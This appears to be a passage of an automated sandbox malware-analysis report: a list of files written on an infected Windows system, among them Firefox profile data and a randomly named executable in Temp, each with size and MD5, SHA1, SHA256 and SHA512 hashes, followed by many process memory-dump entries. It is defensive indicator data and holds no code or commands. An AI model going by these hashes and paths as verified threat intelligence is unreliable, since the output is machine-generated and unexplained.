                                                      6332d3bf71f7bfbc5235ee8515bc5cdb0342301709e42704e91bb216758340ac5e439485e7c0fdfb6d970757c2720a0a6ffbc2c07940eac91a4042f29a9cb19c

                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                      Filesize

                                                      7KB

                                                      MD5

                                                      1b5e04d579be29ec930b50723788978a

                                                      SHA1

                                                      4e2c27e4ff49cae42c8dba7b8759dfbec6002383

                                                      SHA256

                                                      cafbd2f90f4fcc53381763a41d183f77e1d3d119f5dab5898e4f20de7bc88b05

                                                      SHA512

                                                      9b0fa9506b47f98b50ae51a46ccc1b769fd76c4665c489424422482a00ed8671d1cb460b342176cc6e3d45ca55082056ccf963c19a41b0a046a08aaf02479198

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\db\data.safe.bin

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      dabd307473587db0a74615a039330f5a

                                                      SHA1

                                                      c19fbf88e1e5140f5b7319b4d9f91cc757543384

                                                      SHA256

                                                      46ebc8442b9e4c45133426636910b8e2f98b722317166020be616cb71b0b0ada

                                                      SHA512

                                                      4ac61fa59f7660eb492ea1c476e332fd3c39ba7f3963fcab30ad759c752f9ff486633a5adf7d5855a79e12c94d87198997365efe1481729924eac9a6ca2089a2

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings\043a673c-aa9e-4a7e-9699-85c0fed5167b

                                                      Filesize

                                                      12KB

                                                      MD5

                                                      4473dae19f872ac4906aa72b6f3c1bf3

                                                      SHA1

                                                      64e50d31a31dceb1824c1d2b8124862576c329b3

                                                      SHA256

                                                      585f072910bcf3f3b24df8c5569348526f7d6e5ce2cac64ab66133f9f6880750

                                                      SHA512

                                                      8a382e03db3a8bf5a7e0ccb50dc25983a2594c4c010f9815585ec5888f7a972155bb94abfb3340e28d68bc2adeb22c450eaf7fedf18a9bdcd712cbdc8c69fd2d

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\datareporting\glean\pending_pings\939cfb83-0f67-4dfc-831d-79bd6056284d

                                                      Filesize

                                                      745B

                                                      MD5

                                                      4703d3afed1dcc03a88da70a8985dd3f

                                                      SHA1

                                                      f258c0b4b55b03ee3d7369097d4b7efeb13b9322

                                                      SHA256

                                                      64605e7fcca32199ba586e0c906af3166f1f83ddb645eca9bb5f9fd6131c91b9

                                                      SHA512

                                                      060f05cb8dca549d9f36151a5213820f7561cc8a73d66d1f29bfe176ec976b1619528a9343550c8b9af49d12ed6152e2d20208521f8bb52f60639805c4b7fe5e

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.dll

                                                      Filesize

                                                      997KB

                                                      MD5

                                                      fe3355639648c417e8307c6d051e3e37

                                                      SHA1

                                                      f54602d4b4778da21bc97c7238fc66aa68c8ee34

                                                      SHA256

                                                      1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

                                                      SHA512

                                                      8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.info

                                                      Filesize

                                                      116B

                                                      MD5

                                                      3d33cdc0b3d281e67dd52e14435dd04f

                                                      SHA1

                                                      4db88689282fd4f9e9e6ab95fcbb23df6e6485db

                                                      SHA256

                                                      f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

                                                      SHA512

                                                      a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-widevinecdm\4.10.2449.0\LICENSE.txt

                                                      Filesize

                                                      479B

                                                      MD5

                                                      49ddb419d96dceb9069018535fb2e2fc

                                                      SHA1

                                                      62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

                                                      SHA256

                                                      2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

                                                      SHA512

                                                      48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-widevinecdm\4.10.2449.0\manifest.json

                                                      Filesize

                                                      372B

                                                      MD5

                                                      6981f969f95b2a983547050ab1cb2a20

                                                      SHA1

                                                      e81c6606465b5aefcbef6637e205e9af51312ef5

                                                      SHA256

                                                      13b46a6499f31975c9cc339274600481314f22d0af364b63eeddd2686f9ab665

                                                      SHA512

                                                      9415de9ad5c8a25cee82f8fa1df2e0c3a05def89b45c4564dc4462e561f54fdcaff7aa0f286426e63da02553e9b46179a0f85c7db03d15de6d497288386b26ac

                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll

                                                      Filesize

                                                      10.2MB

                                                      MD5

                                                      54dc5ae0659fabc263d83487ae1c03e4

                                                      SHA1

  SHA1: c572526830da6a5a6478f54bc6edb178a4d641f4
  SHA256: 43cad5d5074932ad10151184bdee4a493bda0953fe8a0cbe6948dff91e3ad67e
  SHA512: 8e8f7b9c7c2ee54749dbc389b0e24722cec0eba7207b7a7d5a1efe99ee8261c4cf708cdbdcca4d72f9a4ada0a1c50c1a46fca2acd189a20a9968ccfdb1cf42d9

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.lib
  Filesize: 1KB
  MD5: 688bed3676d2104e7f17ae1cd2c59404
  SHA1: 952b2cdf783ac72fcb98338723e9afd38d47ad8e
  SHA256: 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
  SHA512: 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.sig
  Filesize: 1KB
  MD5: dea1586a0ebca332d265dc5eda3c1c19
  SHA1: 29e8a8962a3e934fd6a804f9f386173f1b2f9be4
  SHA256: 98fbbc41d2143f8131e9b18fe7521f90d306b9ba95546a513c3293916b1fce60
  SHA512: 0e1e5e9af0790d38a29e9f1fbda7107c52f162c1503822d8860199c90dc8430b093d09aef74ac45519fb20aedb32c70c077d74a54646730b98e026073cedd0d6

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\prefs-1.js
  Filesize: 7KB
  MD5: 0898280032838ad0fb9f0dfce036cea1
  SHA1: 8c4da3937edf8d0c46a29708868111c6152da848
  SHA256: b78138d42bb7d3622b8fc0bdfe3badf8ed861278182c7d70173908cfbdfa29bb
  SHA512: 2348698faf115f7014929182286ed036f7e5f7ae1db06d209e1bfccf617f70f87dd9edc20e3a6b6fcd724c4311ee361c7a11459512c9ff9ecd3dd0bb35f3a87d

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\prefs-1.js
  Filesize: 6KB
  MD5: fe74cf9bd494dff05f196a28cc526469
  SHA1: cd198b14b31e264dae43519dc6820d255c9aa10e
  SHA256: 47d26aed2197f0aaf5502ce3dbb73b975f7caa9c4e31b7015687144eaf250b00
  SHA512: 0eabbff54ef048322327cbfcca8ddf85e2ceb413b6ee872c0142dc016c31608452332dc2116263d37e55f82b06d34c5ea234bec8cd3baafbe7810de75a0f8926

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1bogwdvw.default-release\sessionstore-backups\recovery.jsonlz4
  Filesize: 4KB
  MD5: 0f678fb0d8beba292c90188bbc4d4ec3
  SHA1: 590dd692d393d8d0437b9fb8301fbdbea3e79ced
  SHA256: 837d7c75fc579b2c5ac9ab0660e8b9624814aec006b8b0ba591460ed965d5930
  SHA512: 55294db656dcaf054a8bb2440b03ff541b8c8aa16ebbe5c345802dc2e929bb9649106ebf010424da6a57b609247a321c7c665ac28d88434da15d8c086b83d6e0

• \Users\Admin\AppData\Local\TempMWEXPB8SHMLMVDZYVX5EP5OG8YUPXUCW.EXE
  Filesize: 2.0MB
  MD5: 63dfb36c0f5e23440ba4883aa4724e7c
  SHA1: 75c634d8c13392e377e0f5a6ebd13b55337e7b87
  SHA256: d716f4c5b3f4e213aa10ab222d307fec44a1cab34f512807176a07cc412bf319
  SHA512: fac6535f2e89c058f8564f7b09c3540f8afaf7f040e28391f3933fd58fd9ae7860a5e6d9b76dc1ee7dd0d5329aaf50d7ec06649d588d5496f3e137892fe61015

• memory/288-784-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-479-0x00000000069E0000-0x0000000006E48000-memory.dmp
  Filesize: 4.4MB

• memory/288-232-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-231-0x00000000069E0000-0x0000000006E82000-memory.dmp
  Filesize: 4.6MB

• memory/288-31-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-397-0x00000000069E0000-0x0000000007076000-memory.dmp
  Filesize: 6.6MB

• memory/288-163-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-414-0x00000000069E0000-0x0000000006E48000-memory.dmp
  Filesize: 4.4MB

• memory/288-413-0x00000000069E0000-0x0000000006E48000-memory.dmp
  Filesize: 4.4MB

• memory/288-257-0x00000000069E0000-0x0000000007076000-memory.dmp
  Filesize: 6.6MB

• memory/288-92-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-420-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-227-0x00000000069E0000-0x0000000007076000-memory.dmp
  Filesize: 6.6MB

• memory/288-228-0x00000000069E0000-0x0000000007076000-memory.dmp
  Filesize: 6.6MB

• memory/288-225-0x00000000069E0000-0x0000000006E82000-memory.dmp
  Filesize: 4.6MB

• memory/288-1017-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-93-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-569-0x00000000069E0000-0x0000000006E48000-memory.dmp
  Filesize: 4.4MB

• memory/288-1719-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-1701-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-209-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-700-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-204-0x00000000069E0000-0x0000000006E82000-memory.dmp
  Filesize: 4.6MB

• memory/288-1653-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-1612-0x0000000001160000-0x000000000161A000-memory.dmp
  Filesize: 4.7MB

• memory/288-205-0x00000000069E0000-0x0000000006E82000-memory.dmp
  Filesize: 4.6MB

• memory/448-54-0x0000000002240000-0x0000000002248000-memory.dmp
  Filesize: 32KB

• memory/448-53-0x000000001B5B0000-0x000000001B892000-memory.dmp
  Filesize: 2.9MB

• memory/1472-1025-0x0000000000D20000-0x00000000017AE000-memory.dmp
  Filesize: 10.6MB

• memory/1668-171-0x0000000000340000-0x00000000007FA000-memory.dmp
  Filesize: 4.7MB

• memory/1668-170-0x0000000000340000-0x00000000007FA000-memory.dmp
  Filesize: 4.7MB

• memory/1988-1599-0x0000000000400000-0x000000000040E000-memory.dmp
  Filesize: 56KB

• memory/1988-1610-0x0000000000400000-0x000000000040E000-memory.dmp
  Filesize: 56KB

• memory/1988-1601-0x0000000000400000-0x000000000040E000-memory.dmp
  Filesize: 56KB

• memory/1988-1603-0x0000000000400000-0x000000000040E000-memory.dmp
  Filesize: 56KB

• memory/1988-1605-0x0000000000400000-0x000000000040E000-memory.dmp
  Filesize: 56KB

• memory/1988-1607-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
  Filesize: 4KB

• memory/1988-1608-0x0000000000400000-0x000000000040E000-memory.dmp
  Filesize: 56KB

• memory/1988-1609-0x0000000000400000-0x000000000040E000-memory.dmp
  Filesize: 56KB

• memory/2168-207-0x0000000000120000-0x00000000005C2000-memory.dmp
  Filesize: 4.6MB

• memory/2168-210-0x0000000000120000-0x00000000005C2000-memory.dmp
  Filesize: 4.6MB

• memory/2340-168-0x0000000006650000-0x0000000006B0A000-memory.dmp
  Filesize: 4.7MB

• memory/2340-167-0x0000000006650000-0x0000000006B0A000-memory.dmp
  Filesize: 4.7MB

• memory/2552-416-0x0000000000840000-0x0000000000CA8000-memory.dmp
  Filesize: 4.4MB

• memory/2552-415-0x0000000000840000-0x0000000000CA8000-memory.dmp
  Filesize: 4.4MB

• memory/2632-30-0x0000000001050000-0x000000000150A000-memory.dmp
  Filesize: 4.7MB

• memory/2632-15-0x0000000001050000-0x000000000150A000-memory.dmp
  Filesize: 4.7MB

• memory/2652-12-0x0000000006590000-0x0000000006A4A000-memory.dmp
  Filesize: 4.7MB

• memory/2652-14-0x0000000006590000-0x0000000006A4A000-memory.dmp
  Filesize: 4.7MB

• memory/2656-575-0x000000001B560000-0x000000001B842000-memory.dmp
  Filesize: 2.9MB

• memory/2656-586-0x0000000002810000-0x0000000002818000-memory.dmp
  Filesize: 32KB

• memory/2752-229-0x0000000000830000-0x0000000000EC6000-memory.dmp
  Filesize: 6.6MB

• memory/2752-230-0x0000000000830000-0x0000000000EC6000-memory.dmp
  Filesize: 6.6MB

• memory/2888-134-0x00000000002C0000-0x000000000077A000-memory.dmp
  Filesize: 4.7MB

• memory/2888-126-0x00000000002C0000-0x000000000077A000-memory.dmp
  Filesize: 4.7MB

• memory/2964-130-0x0000000073DC0000-0x0000000073DEF000-memory.dmp
  Filesize: 188KB

• memory/2964-124-0x00000000064D0000-0x000000000698A000-memory.dmp
  Filesize: 4.7MB

• memory/2964-129-0x0000000071E70000-0x00000000720E8000-memory.dmp
  Filesize: 2.5MB

• memory/2964-125-0x00000000064D0000-0x000000000698A000-memory.dmp
  Filesize: 4.7MB

• memory/3096-1659-0x0000000000080000-0x000000000008A000-memory.dmp
  Filesize: 40KB

• memory/3096-1662-0x0000000077230000-0x00000000773D9000-memory.dmp
  Filesize: 1.7MB

• memory/3096-1664-0x0000000075A90000-0x0000000075AD7000-memory.dmp
  Filesize: 284KB

• memory/3096-1661-0x0000000002920000-0x0000000002D20000-memory.dmp
  Filesize: 4.0MB

• memory/3180-1655-0x0000000003D90000-0x0000000004190000-memory.dmp
  Filesize: 4.0MB

• memory/3180-1647-0x0000000003D10000-0x0000000003D8F000-memory.dmp
  Filesize: 508KB

• memory/3180-1654-0x0000000003D90000-0x0000000004190000-memory.dmp
  Filesize: 4.0MB

• memory/3180-1656-0x0000000077230000-0x00000000773D9000-memory.dmp
  Filesize: 1.7MB

• memory/3180-1648-0x0000000003D10000-0x0000000003D8F000-memory.dmp
  Filesize: 508KB

• memory/3180-1658-0x0000000075A90000-0x0000000075AD7000-memory.dmp
  Filesize: 284KB

• memory/3180-1649-0x0000000003D10000-0x0000000003D8F000-memory.dmp
  Filesize: 508KB

• memory/3180-1651-0x0000000003D10000-0x0000000003D8F000-memory.dmp
  Filesize: 508KB

• memory/3180-1652-0x0000000003D10000-0x0000000003D8F000-memory.dmp
  Filesize: 508KB

• memory/3180-1650-0x0000000003D10000-0x0000000003D8F000-memory.dmp
  Filesize: 508KB

• memory/3236-756-0x0000000000400000-0x000000000085E000-memory.dmp
  Filesize: 4.4MB

• memory/3236-881-0x0000000000400000-0x000000000085E000-memory.dmp
  Filesize: 4.4MB

• memory/3236-1024-0x0000000000400000-0x000000000085E000-memory.dmp
  Filesize: 4.4MB

• memory/3268-1722-0x0000000001150000-0x00000000011F8000-memory.dmp
  Filesize: 672KB

• memory/3268-4517-0x0000000000F00000-0x0000000000F4C000-memory.dmp
  Filesize: 304KB

• memory/3268-4518-0x00000000010D0000-0x0000000001124000-memory.dmp
  Filesize: 336KB

• memory/3268-4516-0x00000000005B0000-0x0000000000606000-memory.dmp
  Filesize: 344KB

• memory/3268-1724-0x000000001BE70000-0x000000001BF77000-memory.dmp
  Filesize: 1.0MB

• memory/3268-1725-0x000000001BE70000-0x000000001BF77000-memory.dmp
  Filesize: 1.0MB

• memory/3268-1727-0x000000001BE70000-0x000000001BF77000-memory.dmp
  Filesize: 1.0MB

• memory/3268-1723-0x000000001BE70000-0x000000001BF7A000-memory.dmp
  Filesize: 1.0MB

• memory/3268-1729-0x000000001BE70000-0x000000001BF77000-memory.dmp
  Filesize: 1.0MB

• memory/3480-1716-0x00000000023A0000-0x00000000023A8000-memory.dmp
  Filesize: 32KB

• memory/3480-1715-0x000000001B6B0000-0x000000001B992000-memory.dmp
  Filesize: 2.9MB

• memory/3620-1635-0x0000000000C80000-0x000000000112C000-memory.dmp
  Filesize: 4.7MB

• memory/3620-1636-0x0000000000C80000-0x000000000112C000-memory.dmp
  Filesize: 4.7MB

• memory/3660-1679-0x0000000000400000-0x000000000068D000-memory.dmp
  Filesize: 2.6MB

• memory/3840-859-0x0000000073C80000-0x0000000073D00000-memory.dmp
  Filesize: 512KB

• memory/3840-1611-0x0000000073240000-0x0000000073820000-memory.dmp
  Filesize: 5.9MB

• memory/3840-831-0x0000000001380000-0x000000000196C000-memory.dmp
  Filesize: 5.9MB

• memory/3840-1576-0x0000000001100000-0x0000000001152000-memory.dmp
  Filesize: 328KB

• memory/3840-848-0x0000000073240000-0x0000000073820000-memory.dmp
  Filesize: 5.9MB

• memory/3840-849-0x0000000073240000-0x0000000073820000-memory.dmp
  Filesize: 5.9MB

• memory/3840-1026-0x0000000073240000-0x0000000073820000-memory.dmp
  Filesize: 5.9MB

• memory/3840-860-0x0000000005040000-0x00000000050AA000-memory.dmp
  Filesize: 424KB

• memory/3840-861-0x00000000002D0000-0x00000000002E0000-memory.dmp
  Filesize: 64KB

• memory/3868-1644-0x0000000000F40000-0x00000000013EC000-memory.dmp
  Filesize: 4.7MB

• memory/3868-1645-0x0000000000F40000-0x00000000013EC000-memory.dmp
  Filesize: 4.7MB